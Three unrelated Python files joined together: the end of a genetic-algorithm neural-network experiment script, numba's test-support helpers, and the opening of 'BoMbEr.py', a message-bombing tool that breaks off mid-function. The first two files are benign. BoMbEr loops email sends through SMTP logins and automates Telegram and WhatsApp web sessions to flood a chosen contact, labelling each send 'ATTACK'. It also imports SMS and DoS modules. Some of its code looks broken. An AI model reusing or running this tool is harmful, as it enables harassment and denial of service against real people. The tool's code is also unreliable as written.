            "mutation_rate": .2,
            "crossover_rate": .2,
            "hidden_layer": [6,8]
        }
    }
    ##############################################
    # START MULTIPROCESS JOB POOL
    ##############################################
    manager = multiprocessing.Manager()
    q = manager.Queue()
    # Dedicated process that drains the queue and appends rows to the CSV.
    writer = multiprocessing.Process(target=data_writer, args=(q,filename))
    writer.start()
    pool = multiprocessing.Pool()
    ##############################################
    du = DataUtility.DataUtility(categorical_attribute_indices, regression_data_set)
    total_counter = 0
    for data_set in data_sets:
        # NOTE: this filter restricts the current run to the abalone set only.
        if data_set != "abalone": continue
        regression = regression_data_set[data_set]
        tuned_parameters = [tuned_0_hl[data_set], tuned_1_hl[data_set], tuned_2_hl[data_set]]
        data_set_counter = 0
        # ten fold data and labels is a list of [data, labels] pairs, where
        # data and labels are numpy arrays:
        tenfold_data_and_labels = du.Dataset_and_Labels(data_set)
        for j in range(10):
            data_package = generate_data_package(fold=j, tenfolds=tenfold_data_and_labels, regression=regression, du=du)
            for z in range(3):
                # NOTE: only the two-hidden-layer configuration (z == 2) runs.
                if z != 2: continue
                hidden_layers = tuned_parameters[z]["hidden_layer"]
                # these are the parameters that were tuned:
                ############################################
                # popss =[100] # paper suggests 10 * total weight
                # bet = [.5,.8,.2] # note suggested from paper: [.5 , 1]
                # cr = [.1, .3, .8] # note suggested from paper: cr from [0,.3], [.8, 1] if not converging
                # maxgen = [500]
                total_trials = 180
                hyperparameters = {
                    "maxGen":500,
                    "pop_size":500,
                    "mutation_rate": tuned_parameters[z]["mutation_rate"],
                    "mutation_range": 10,
                    "crossover_rate": tuned_parameters[z]["crossover_rate"]
                }
                # Fan each (data set, fold, architecture) job out to the pool.
                pool.apply_async(driver, args=(
                    q, # queue
                    data_set,
                    data_package,
                    regression,
                    Per,
                    hidden_layers,
                    hyperparameters,
                    data_set_counter,
                    total_counter,
                    total_trials
                ))
                data_set_counter += 1
                total_counter += 1
    ##############################
    # CLOSE THE MULTIPROCESS POOL
    ##############################
    pool.close()
    pool.join()
    # All jobs done: tell the writer process to finish, then wait for it.
    q.put('kill')
    writer.join()
|
support.py | """
Assorted utilities for use in tests.
"""
import cmath
import contextlib
import enum
import errno
import gc
import math
import platform
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import warnings
import traceback
from contextlib import contextmanager
import numpy as np
from numba import testing
from numba.core import errors, typing, utils, config, cpu
from numba.core.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
import unittest
from numba.core.runtime import rtsys
from numba.np import numpy_support
try:
import scipy
except ImportError:
scipy = None
# Compilation flag presets shared across the test suite.
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")

force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")

no_pyobj_flags = Flags()

nrt_flags = Flags()
nrt_flags.set("nrt")

# Decorator used to tag tests as 'important' or 'long_running'.
tag = testing.make_tag_decorator(['important', 'long_running'])

# Skip decorators keyed on platform / interpreter capabilities.
_32bit = sys.maxsize <= 2 ** 32
is_parfors_unsupported = _32bit
skip_parfors_unsupported = unittest.skipIf(
    is_parfors_unsupported,
    'parfors not supported',
)
skip_py38_or_later = unittest.skipIf(
    utils.PYVERSION >= (3, 8),
    "unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
    utils.PYVERSION < (3, 7),
    "try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
    utils.PYVERSION >= (3, 7),
    "try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
_lnx_reason = 'linux only test'
linux_only = unittest.skipIf(not sys.platform.startswith('linux'), _lnx_reason)
_is_armv7l = platform.machine() == 'armv7l'
disabled_test = unittest.skipIf(True, 'Test disabled')
# See issue #4026, PPC64LE LLVM bug
skip_ppc64le_issue4026 = unittest.skipIf(platform.machine() == 'ppc64le',
                                         ("Hits: 'LLVM Invalid PPC CTR Loop! "
                                          "UNREACHABLE executed' bug"))
# Optional SciPy-backed LAPACK/BLAS cython bindings: tests that need them are
# skipped when the wrappers cannot be imported.
try:
    import scipy.linalg.cython_lapack
    has_lapack = True
except ImportError:
    has_lapack = False
needs_lapack = unittest.skipUnless(has_lapack,
                                   "LAPACK needs SciPy 1.0+")
try:
    import scipy.linalg.cython_blas
    has_blas = True
except ImportError:
    has_blas = False
needs_blas = unittest.skipUnless(has_blas, "BLAS needs SciPy 1.0+")
class CompilationCache(object):
    """
    A cache of compilation results for various signatures and flags.
    This can make tests significantly faster (or less slow).
    """

    def __init__(self):
        self.typingctx = typing.Context()
        self.targetctx = cpu.CPUContext(self.typingctx)
        self.cr_cache = {}

    def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
        """
        Compile the function or retrieve an already compiled result
        from the cache.
        """
        from numba.core.registry import cpu_target
        key = (func, args, return_type, flags)
        try:
            return self.cr_cache[key]
        except KeyError:
            # Register the contexts in case for nested @jit or @overload calls
            # (same as compile_isolated())
            with cpu_target.nested_context(self.typingctx, self.targetctx):
                result = compile_extra(self.typingctx, self.targetctx, func,
                                       args, return_type, flags, locals={})
            self.cr_cache[key] = result
            return result
class TestCase(unittest.TestCase):
    """Base test case with precise-equality helpers shared by the suite."""

    longMessage = True

    # A random state yielding the same random numbers for any test case.
    # Use as `self.random.<method name>`
    @utils.cached_property
    def random(self):
        return np.random.RandomState(42)

    def reset_module_warnings(self, module):
        """
        Reset the warnings registry of a module. This can be necessary
        as the warnings module is buggy in that regard.
        See http://bugs.python.org/issue4180
        """
        if isinstance(module, str):
            module = sys.modules[module]
        try:
            del module.__warningregistry__
        except AttributeError:
            pass

    @contextlib.contextmanager
    def assertTypingError(self):
        """
        A context manager that asserts the enclosed code block fails
        compiling in nopython mode.
        """
        _accepted_errors = (errors.LoweringError, errors.TypingError,
                            TypeError, NotImplementedError)
        with self.assertRaises(_accepted_errors) as cm:
            yield cm

    @contextlib.contextmanager
    def assertRefCount(self, *objects):
        """
        A context manager that asserts the given objects have the
        same reference counts before and after executing the
        enclosed block.
        """
        old_refcounts = [sys.getrefcount(x) for x in objects]
        yield
        new_refcounts = [sys.getrefcount(x) for x in objects]
        for old, new, obj in zip(old_refcounts, new_refcounts, objects):
            if old != new:
                self.fail("Refcount changed from %d to %d for object: %r"
                          % (old, new, obj))

    @contextlib.contextmanager
    def assertNoNRTLeak(self):
        """
        A context manager that asserts no NRT leak was created during
        the execution of the enclosed block.
        """
        old = rtsys.get_allocation_stats()
        yield
        new = rtsys.get_allocation_stats()
        total_alloc = new.alloc - old.alloc
        total_free = new.free - old.free
        total_mi_alloc = new.mi_alloc - old.mi_alloc
        total_mi_free = new.mi_free - old.mi_free
        self.assertEqual(total_alloc, total_free,
                         "number of data allocs != number of data frees")
        self.assertEqual(total_mi_alloc, total_mi_free,
                         "number of meminfo allocs != number of meminfo frees")

    # Type-family tables used by _detect_family().
    _bool_types = (bool, np.bool_)
    _exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
                       (bytes, np.bytes_)]
    # Consistency fix: np.inexact was a bare class where every other entry is
    # a tuple; isinstance() accepts both forms, so behaviour is unchanged.
    _approx_typesets = [(float,), (complex,), (np.inexact,)]
    _sequence_typesets = [(tuple, list)]
    _float_types = (float, np.floating)
    _complex_types = (complex, np.complexfloating)

    def _detect_family(self, numeric_object):
        """
        This function returns a string description of the type family
        that the object in question belongs to.  Possible return values
        are: "exact", "complex", "approximate", "sequence", and "unknown"
        (plus "ndarray" and "enum" for those special cases).
        """
        if isinstance(numeric_object, np.ndarray):
            return "ndarray"
        if isinstance(numeric_object, enum.Enum):
            return "enum"
        for tp in self._sequence_typesets:
            if isinstance(numeric_object, tp):
                return "sequence"
        for tp in self._exact_typesets:
            if isinstance(numeric_object, tp):
                return "exact"
        for tp in self._complex_types:
            if isinstance(numeric_object, tp):
                return "complex"
        for tp in self._approx_typesets:
            if isinstance(numeric_object, tp):
                return "approximate"
        return "unknown"

    def _fix_dtype(self, dtype):
        """
        Fix the given *dtype* for comparison.
        """
        # Under 64-bit Windows, Numpy may return either int32 or int64
        # arrays depending on the function.
        if (sys.platform == 'win32' and sys.maxsize > 2**32 and
            dtype == np.dtype('int32')):
            return np.dtype('int64')
        else:
            return dtype

    def _fix_strides(self, arr):
        """
        Return the strides of the given array, fixed for comparison.
        Strides for 0- or 1-sized dimensions are ignored.
        """
        if arr.size == 0:
            return [0] * arr.ndim
        else:
            return [stride / arr.itemsize
                    for (stride, shape) in zip(arr.strides, arr.shape)
                    if shape > 1]

    def assertStridesEqual(self, first, second):
        """
        Test that two arrays have the same shape and strides.
        """
        self.assertEqual(first.shape, second.shape, "shapes differ")
        self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
        self.assertEqual(self._fix_strides(first), self._fix_strides(second),
                         "strides differ")

    def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
                           msg=None, ignore_sign_on_zero=False,
                           abs_tol=None
                           ):
        """
        Versatile equality testing function with more built-in checks than
        standard assertEqual().

        For arrays, test that layout, dtype, shape are identical, and
        recursively call assertPreciseEqual() on the contents.

        For other sequences, recursively call assertPreciseEqual() on
        the contents.

        For scalars, test that two scalars or have similar types and are
        equal up to a computed precision.
        If the scalars are instances of exact types or if *prec* is
        'exact', they are compared exactly.
        If the scalars are instances of inexact types (float, complex)
        and *prec* is not 'exact', then the number of significant bits
        is computed according to the value of *prec*: 53 bits if *prec*
        is 'double', 24 bits if *prec* is single. This number of bits
        can be lowered by raising the *ulps* value.

        ignore_sign_on_zero can be set to True if zeros are to be considered
        equal regardless of their sign bit.

        abs_tol if this is set to a float value its value is used in the
        following. If, however, this is set to the string "eps" then machine
        precision of the type(first) is used in the following instead. This
        kwarg is used to check if the absolute difference in value between first
        and second is less than the value set, if so the numbers being compared
        are considered equal. (This is to handle small numbers typically of
        magnitude less than machine precision).

        Any value of *prec* other than 'exact', 'single' or 'double'
        will raise an error.
        """
        try:
            self._assertPreciseEqual(first, second, prec, ulps, msg,
                                     ignore_sign_on_zero, abs_tol)
        except AssertionError as exc:
            failure_msg = str(exc)
            # Fall off of the 'except' scope to avoid Python 3 exception
            # chaining.
        else:
            return
        # Decorate the failure message with more information
        self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))

    def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
                            msg=None, ignore_sign_on_zero=False,
                            abs_tol=None):
        """Recursive workhorse for assertPreciseEqual()."""

        def _assertNumberEqual(first, second, delta=None):
            if (delta is None or first == second == 0.0
                    or math.isinf(first) or math.isinf(second)):
                self.assertEqual(first, second, msg=msg)
                # For signed zeros
                if not ignore_sign_on_zero:
                    try:
                        if math.copysign(1, first) != math.copysign(1, second):
                            self.fail(
                                self._formatMessage(msg,
                                                    "%s != %s" %
                                                    (first, second)))
                    except TypeError:
                        pass
            else:
                self.assertAlmostEqual(first, second, delta=delta, msg=msg)

        first_family = self._detect_family(first)
        second_family = self._detect_family(second)
        assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
                                                                  second_family)
        if msg:
            assertion_message += ': %s' % (msg,)
        self.assertEqual(first_family, second_family, msg=assertion_message)

        # We now know they are in the same comparison family
        compare_family = first_family

        # For recognized sequences, recurse
        if compare_family == "ndarray":
            dtype = self._fix_dtype(first.dtype)
            self.assertEqual(dtype, self._fix_dtype(second.dtype))
            self.assertEqual(first.ndim, second.ndim,
                             "different number of dimensions")
            self.assertEqual(first.shape, second.shape,
                             "different shapes")
            self.assertEqual(first.flags.writeable, second.flags.writeable,
                             "different mutability")
            # itemsize is already checked by the dtype test above
            self.assertEqual(self._fix_strides(first),
                             self._fix_strides(second), "different strides")
            if first.dtype != dtype:
                first = first.astype(dtype)
            if second.dtype != dtype:
                second = second.astype(dtype)
            for a, b in zip(first.flat, second.flat):
                self._assertPreciseEqual(a, b, prec, ulps, msg,
                                         ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "sequence":
            self.assertEqual(len(first), len(second), msg=msg)
            for a, b in zip(first, second):
                self._assertPreciseEqual(a, b, prec, ulps, msg,
                                         ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "exact":
            exact_comparison = True

        elif compare_family in ["complex", "approximate"]:
            exact_comparison = False

        elif compare_family == "enum":
            self.assertIs(first.__class__, second.__class__)
            self._assertPreciseEqual(first.value, second.value,
                                     prec, ulps, msg,
                                     ignore_sign_on_zero, abs_tol)
            return

        elif compare_family == "unknown":
            # Assume these are non-numeric types: we will fall back
            # on regular unittest comparison.
            self.assertIs(first.__class__, second.__class__)
            exact_comparison = True

        else:
            assert 0, "unexpected family"

        # If a Numpy scalar, check the dtype is exactly the same too
        # (required for datetime64 and timedelta64).
        if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
            self.assertEqual(first.dtype, second.dtype)

        # Mixing bools and non-bools should always fail
        if (isinstance(first, self._bool_types) !=
                isinstance(second, self._bool_types)):
            assertion_message = ("Mismatching return types (%s vs. %s)"
                                 % (first.__class__, second.__class__))
            if msg:
                assertion_message += ': %s' % (msg,)
            self.fail(assertion_message)

        try:
            if cmath.isnan(first) and cmath.isnan(second):
                # The NaNs will compare unequal, skip regular comparison
                return
        except TypeError:
            # Not floats.
            pass

        # if absolute comparison is set, use it
        if abs_tol is not None:
            if abs_tol == "eps":
                rtol = np.finfo(type(first)).eps
            elif isinstance(abs_tol, float):
                rtol = abs_tol
            else:
                raise ValueError("abs_tol is not \"eps\" or a float, found %s"
                                 % abs_tol)
            if abs(first - second) < rtol:
                return

        exact_comparison = exact_comparison or prec == 'exact'

        if not exact_comparison and prec != 'exact':
            # Compute an allowed delta from the requested significand width,
            # widened by *ulps* units in the last place.
            if prec == 'single':
                bits = 24
            elif prec == 'double':
                bits = 53
            else:
                raise ValueError("unsupported precision %r" % (prec,))
            k = 2 ** (ulps - bits - 1)
            delta = k * (abs(first) + abs(second))
        else:
            delta = None
        if isinstance(first, self._complex_types):
            _assertNumberEqual(first.real, second.real, delta)
            _assertNumberEqual(first.imag, second.imag, delta)
        elif isinstance(first, (np.timedelta64, np.datetime64)):
            # Since Np 1.16 NaT == NaT is False, so special comparison needed
            if numpy_support.numpy_version >= (1, 16) and np.isnat(first):
                self.assertEqual(np.isnat(first), np.isnat(second))
            else:
                _assertNumberEqual(first, second, delta)
        else:
            _assertNumberEqual(first, second, delta)

    def run_nullary_func(self, pyfunc, flags):
        """
        Compile the 0-argument *pyfunc* with the given *flags*, and check
        it returns the same result as the pure Python function.
        The got and expected results are returned.
        """
        cr = compile_isolated(pyfunc, (), flags=flags)
        cfunc = cr.entry_point
        expected = pyfunc()
        got = cfunc()
        self.assertPreciseEqual(got, expected)
        return got, expected
class SerialMixin(object):
    """Mixin to mark test for serial execution.
    """
    # Flag read by the parallel test runner; False forces serial execution.
    _numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
    """
    Return a context manager that temporarily sets Numba config variable
    *name* to *value*. *name* must be the name of an existing variable
    in numba.config.
    """
    saved = getattr(config, name)
    setattr(config, name, value)
    try:
        yield
    finally:
        # Restore the previous value even if the body raised.
        setattr(config, name, saved)
@contextlib.contextmanager
def override_env_config(name, value):
    """
    Return a context manager that temporarily sets an Numba config environment
    *name* to *value*.
    """
    previous = os.environ.get(name)
    os.environ[name] = value
    config.reload_config()
    try:
        yield
    finally:
        if previous is None:
            # The variable did not exist before: remove it again.
            del os.environ[name]
        else:
            # Otherwise put the saved value back.
            os.environ[name] = previous
        # Always reload so numba.config reflects the restored environment.
        config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
    """
    Tweak the code object of the given function by replacing its
    *codestring* (a bytes object) and *consts* tuple, optionally.
    """
    co = func.__code__
    tp = type(co)
    if codestring is None:
        codestring = co.co_code
    if consts is None:
        consts = co.co_consts
    # CodeType's constructor gained a posonlyargcount argument in Python 3.8;
    # the two branches differ only in that extra positional field.
    if utils.PYVERSION >= (3, 8):
        new_code = tp(co.co_argcount, co.co_posonlyargcount,
                      co.co_kwonlyargcount, co.co_nlocals,
                      co.co_stacksize, co.co_flags, codestring,
                      consts, co.co_names, co.co_varnames,
                      co.co_filename, co.co_name, co.co_firstlineno,
                      co.co_lnotab)
    else:
        new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
                      co.co_stacksize, co.co_flags, codestring,
                      consts, co.co_names, co.co_varnames,
                      co.co_filename, co.co_name, co.co_firstlineno,
                      co.co_lnotab)
    # Install the rebuilt code object in place.
    func.__code__ = new_code
# Root directory for per-run temporary test directories ("the trashcan").
_trashcan_dir = 'numba-tests'

if os.name == 'nt':
    # Under Windows, gettempdir() points to the user-local temp dir
    _trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
    # Mix the UID into the directory name to allow different users to
    # run the test suite without permission errors (issue #1586)
    _trashcan_dir = os.path.join(tempfile.gettempdir(),
                                 "%s.%s" % (_trashcan_dir, os.getuid()))

# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600  # 1 day
def _create_trashcan_dir():
    """Create the shared trashcan directory, tolerating its existence."""
    # Python 3 raises FileExistsError for EEXIST, so suppressing it is
    # equivalent to the classic errno check; other OSErrors still propagate.
    with contextlib.suppress(FileExistsError):
        os.mkdir(_trashcan_dir)
def _purge_trashcan_dir():
    """Delete trashcan entries older than the staleness timeout."""
    cutoff = time.time() - _trashcan_timeout
    for entry in sorted(os.listdir(_trashcan_dir)):
        path = os.path.join(_trashcan_dir, entry)
        try:
            if os.stat(path).st_mtime < cutoff:
                shutil.rmtree(path, ignore_errors=True)
        except OSError:
            # In parallel testing, several processes can attempt to
            # remove the same entry at once, ignore.
            pass
def _create_trashcan_subdir(prefix):
    """Purge stale entries, then make a fresh subdirectory inside the
    trashcan directory and return its path."""
    _purge_trashcan_dir()
    return tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
def temp_directory(prefix):
    """
    Return a temporary directory named after *prefix* that survives at
    least as long as this process invocation; it is reaped later, once
    it becomes stale enough.
    This matters because a DLL file can't be deleted while in use under
    Windows, and as a side-effect the test files remain inspectable
    shortly after a test suite run.
    """
    _create_trashcan_dir()
    return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
    """
    Import and return the module named *modname*.  The import system's
    directory caches are invalidated first, so freshly written module
    files are picked up.
    """
    import importlib
    importlib.invalidate_caches()
    return importlib.import_module(modname)
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
    """Context manager backing captured_stdout/captured_stderr: swaps
    the ``sys`` stream named *stream_name* for a fresh StringIO, yields
    that buffer, and restores the original stream on exit."""
    saved_stream = getattr(sys, stream_name)
    buffer = io.StringIO()
    setattr(sys, stream_name, buffer)
    try:
        yield buffer
    finally:
        setattr(sys, stream_name, saved_stream)
def captured_stdout():
    """Capture everything written to sys.stdout, e.g.:
    with captured_stdout() as stdout:
        print("hello")
    self.assertEqual(stdout.getvalue(), "hello\n")
    """
    return captured_output("stdout")
def captured_stderr():
    """Capture everything written to sys.stderr, e.g.:
    with captured_stderr() as stderr:
        print("hello", file=sys.stderr)
    self.assertEqual(stderr.getvalue(), "hello\n")
    """
    return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
    """Capture stdout while the DEBUG_CACHE config flag is forced on,
    yielding the stdout buffer."""
    with captured_stdout() as out, override_config('DEBUG_CACHE', True):
        yield out
class MemoryLeak(object):
    """Helper that snapshots NRT allocation statistics and later asserts
    that every allocation made since the snapshot was freed."""

    # Class-level default; disable_leak_check() shadows it per instance.
    __enable_leak_check = True

    def memory_leak_setup(self):
        # Clean up any NRT-backed objects hanging in a dead reference cycle
        gc.collect()
        self.__init_stats = rtsys.get_allocation_stats()

    def memory_leak_teardown(self):
        if self.__enable_leak_check:
            self.assert_no_memory_leak()

    def assert_no_memory_leak(self):
        before = self.__init_stats
        after = rtsys.get_allocation_stats()
        # Allocations and frees since setup must balance exactly.
        self.assertEqual(after.alloc - before.alloc,
                         after.free - before.free)
        self.assertEqual(after.mi_alloc - before.mi_alloc,
                         after.mi_free - before.mi_free)

    def disable_leak_check(self):
        # For per-test use when MemoryLeakMixin is injected into a TestCase
        self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
    """TestCase mixin wiring the MemoryLeak checks into setUp/tearDown."""

    def setUp(self):
        super().setUp()
        self.memory_leak_setup()

    def tearDown(self):
        super().tearDown()
        # Collect garbage first so dead cycles don't count as leaks.
        gc.collect()
        self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
    """
    Forbid LLVM code generation during the execution of the context
    manager's enclosed block.
    If code generation is invoked, a RuntimeError is raised.
    """
    from numba.core import codegen
    patchpoints = ['CodeLibrary._finalize_final_module']

    def fail(*args, **kwargs):
        raise RuntimeError("codegen forbidden by test case")

    saved = {}
    try:
        # XXX use the mock library instead?
        for dotted in patchpoints:
            *path, attrname = dotted.split('.')
            target = codegen
            for part in path:
                target = getattr(target, part)
            original = getattr(target, attrname)
            assert callable(original), ("%r should be callable" % dotted)
            saved[target, attrname] = original
            setattr(target, attrname, fail)
        yield
    finally:
        # Restore every attribute that was patched, even on error.
        for (target, attrname), original in saved.items():
            setattr(target, attrname, original)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
    """
    Temporarily redirect *fd* to a pipe's write end and return a file object
    wrapping the pipe's read end.
    """
    from numba import _helperlib
    libnumba = ctypes.CDLL(_helperlib.__file__)
    # Flush any C-level buffered output *before* swapping the descriptor,
    # so pending text still reaches the original destination.
    libnumba._numba_flush_stdout()
    # Keep a duplicate of the original descriptor so it can be restored.
    save = os.dup(fd)
    r, w = os.pipe()
    try:
        os.dup2(w, fd)
        yield io.open(r, "r")
    finally:
        # Flush again so output written while redirected lands in the pipe
        # before it is torn down, then restore the original descriptor.
        libnumba._numba_flush_stdout()
        os.close(w)
        os.dup2(save, fd)
        os.close(save)
def redirect_c_stdout():
    """Redirect the process-level C stdout stream (see redirect_fd)."""
    return redirect_fd(sys.__stdout__.fileno())
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
    """Spawn a new process to run `func` with a temporary cache directory
    named after *cache_dir_prefix*.  The child process's stdout and stderr
    are captured and echoed to the current process's streams.
    Returns
    -------
    ret : dict
        exitcode: 0 for success. 1 for exception-raised.
        stdout: str
        stderr: str
    """
    return run_in_new_process_in_cache_dir(
        func, temp_directory(cache_dir_prefix), verbose=verbose)
def run_in_new_process_in_cache_dir(func, cache_dir, verbose=True):
    """Spawn a new process to run `func` with a temporary cache directory.
    The childprocess's stdout and stderr will be captured and redirected to
    the current process's stdout and stderr.
    Similar to ``run_in_new_process_caching()`` but the ``cache_dir`` is a
    directory path instead of a name prefix for the directory path.
    Returns
    -------
    ret : dict
        exitcode: 0 for success. 1 for exception-raised.
        stdout: str
        stderr: str
    """
    # 'spawn' gives a clean child interpreter on every platform —
    # presumably so the child re-imports modules and exercises the
    # on-disk cache rather than inheriting state via fork.
    ctx = mp.get_context('spawn')
    qout = ctx.Queue()
    # NUMBA_CACHE_DIR must be set before the child starts so it is
    # inherited through the spawned environment.
    with override_env_config('NUMBA_CACHE_DIR', cache_dir):
        proc = ctx.Process(target=_remote_runner, args=[func, qout])
        proc.start()
        proc.join()
    # NOTE(review): join() before draining the queue can deadlock if the
    # child's output exceeds the pipe buffer (see multiprocessing docs,
    # "Joining processes that use queues"), and get_nowait() raises
    # queue.Empty if the child died before putting — TODO confirm this
    # is acceptable for the outputs produced here.
    stdout = qout.get_nowait()
    stderr = qout.get_nowait()
    if verbose and stdout.strip():
        print()
        print('STDOUT'.center(80, '-'))
        print(stdout)
    if verbose and stderr.strip():
        print(file=sys.stderr)
        print('STDERR'.center(80, '-'), file=sys.stderr)
        print(stderr, file=sys.stderr)
    return {
        'exitcode': proc.exitcode,
        'stdout': stdout,
        'stderr': stderr,
    }
def _remote_runner(fn, qout):
    """Child-process entry point for `run_in_new_process_caching()`:
    runs *fn*, ships its captured stdout and stderr back over *qout*,
    then exits with 0 on success or 1 if *fn* raised."""
    with captured_stderr() as err_buf:
        with captured_stdout() as out_buf:
            try:
                fn()
            except Exception:
                traceback.print_exc()
                exitcode = 1
            else:
                exitcode = 0
        qout.put(out_buf.getvalue())
        qout.put(err_buf.getvalue())
    sys.exit(exitcode)
class CheckWarningsMixin(object):
    """TestCase mixin: assert that a code block emits given warnings."""

    @contextlib.contextmanager
    def check_warnings(self, messages, category=RuntimeWarning):
        """Run the enclosed block and check that, across the warnings it
        raised, each substring match from *messages* has *category* and
        the total number of matches equals len(messages)."""
        with warnings.catch_warnings(record=True) as caught:
            warnings.simplefilter("always")
            yield
            matched = 0
            for warning in caught:
                text = str(warning.message)
                for expected in messages:
                    if expected in text:
                        self.assertEqual(warning.category, category)
                        matched += 1
            self.assertEqual(matched, len(messages))
|
BoMbEr.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
╔═════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ BoMbEr ║
║ Author: ║
║ https://github.com/ebankoff ║
║ ║
║ The author of this program is not responsible for its use! ║
║ When posting this code on other resources, please indicate the author! ║
║ ║
║ All rights reserved. ║
║ Copyright (C) 2021 ebankoff ║
║ ║
╚═════════════════════════════════════════════════════════════════════════════════╝
"""
#--------------------------------------(main)--------------------------------------
import os
import sys
import time
import json
import emoji
import random
import shutil
import socket
import ctypes
import smtplib
import os.path
import asyncio
import requests
import colorama
import datetime
import threading
import user_agent
import progressbar
from sms import sms
from dos import dos
from time import sleep
from threading import *
from sys import platform
from asyncio import sleep
from getpass import getpass
from os import name, system
from discord import discord
from progress.bar import Bar
from threading import Thread
from functools import reduce
from bs4 import BeautifulSoup
from requests import get, post
from selenium import webdriver
from os.path import exists, isfile
from random import choice, randint
from bs4 import BeautifulSoup as bs
from selenium_stealth import stealth
from progress.spinner import Spinner
from selenium.webdriver.common.by import By
from colorama import Fore, Back, Style, init
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException
colorama.init()
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
def pb():
spinner = Spinner(Fore.YELLOW + Style.BRIGHT + 'Processing ', max=20)
for i in range(20):
time.sleep(.12)
spinner.next()
spinner.finish()
def check_internet():
try:
pb()
get("http://google.com", timeout=1)
print("\033[32m{}" .format('''
╔════════╗
║Success!║
╚════════╝'''))
except Exception:
print("\033[31m{}" .format('''
╔═══════════════════════╗
║No internet connection!║
╚═══════════════════════╝
'''))
input()
ex()
def ex():
param=input('Exit? yes/no: ')
if param == 'yes':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print("\033[36m{}" .format('''
Thanks for using BoMbEr!
I would be grateful if you star on this repository on GitHub:
https://github.com/ebankoff/BoMbEr
You can support me by sending any amount to my Qiwi:
qiwi.com/n/HERAMANT
Copyright (C) 2021 ebankoff
'''))
print("Press Enter to exit")
input()
os.abort()
elif param == 'no':
main()
else:
print('ERROR: invalid value')
ex()
def email(emails, passwords, to, amount, subj, mes, server):
if server == '1':
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
elif server == '2':
server = smtplib.SMTP('smtp.mail.yahoo.com', 465)
server.starttls()
elif server == '3':
server = smtplib.SMTP('smtp-mail.outlook.com', 587)
server.starttls()
elif server == '4':
server = smtplib.SMTP('smtp.yandex.ru', 465)
server.starttls()
server.login(emails, passwords)
for i in range(amount):
server.sendmail(emails, to, subj, mes)
def telega(name, count, msg, cn):
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get("https://web.telegram.org/k")
time.sleep(35)
search = driver.find_element(By.XPATH, "//*[@id='column-left']/div/div/div[1]/div[2]/input")
search.send_keys(name, Keys.RETURN)
time.sleep(8)
search2 = driver.find_element(By.XPATH, "//*[@id='search-container']/div[2]/div/div/div[1]/div/div[1]/ul")
driver.implicitly_wait(10)
ActionChains(driver).move_to_element(search2).click(search2).perform()
time.sleep(15)
msgBox = driver.find_element(By.XPATH,"//*[@id='column-center']/div/div/div[4]/div/div[1]/div[7]/div[1]/div[1]")
for i in range(count):
msgBox.send_keys(msg, Keys.RETURN)
cn+=1
print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[32m {}" .format(f'ATTACK') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
print("\033[32m {}" .format("Successful!"))
print(f"{cn} messages were sent to {name}")
ex()
except:
print("\033[31m{}" .format('ERROR!'))
ex()
def whatsapp(name, count, msg, cn):
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get("https://web.whatsapp.com")
time.sleep(15)
search = driver.find_element(By.XPATH, "//*[@id='side']/div[1]/div/label/div/div[2]")
search.send_keys(name, Keys.RETURN)
time.sleep(15)
msgBox = driver.find_element(By.XPATH,"//*[@id='main']/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]")
for i in range(count):
try:
msgBox.send_keys(msg, Keys.RETURN)
cn+=1
